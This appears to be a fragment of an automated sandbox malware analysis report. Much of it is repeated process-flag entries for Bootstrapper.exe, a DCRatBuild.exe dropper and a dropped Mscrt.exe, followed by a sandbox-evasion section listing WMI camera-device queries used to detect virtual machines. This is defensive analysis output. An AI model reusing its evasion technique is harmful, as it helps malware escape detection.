Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)

Source: C:\ComponentReviewperfmonitor\Mscrt.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
